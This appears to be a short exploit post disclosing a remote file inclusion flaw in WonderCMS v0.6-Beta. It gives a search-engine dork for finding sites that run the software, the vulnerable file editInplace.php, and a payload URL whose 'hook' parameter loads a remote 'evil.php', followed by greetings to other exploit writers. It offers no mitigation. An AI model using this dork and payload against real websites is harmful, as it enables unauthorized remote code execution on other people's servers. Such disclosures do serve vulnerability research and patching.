==================================================================================================================================== | # Title : WonderCMS v0.6-Beta File inclusion Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : http://wondercms.com/ | | # Dork : ©2015 Your website | Powered by WonderCMS | Login | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] File : editInplace.php . [+] Line 17 : [+] Use payload : /js/editInplace.php?hook=http://127.0.0.1/evil.php [+] http://127.0.0.1/wondercms/js/editInplace.php?hook=http://127.0.0.1/evil.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | ===============================================================================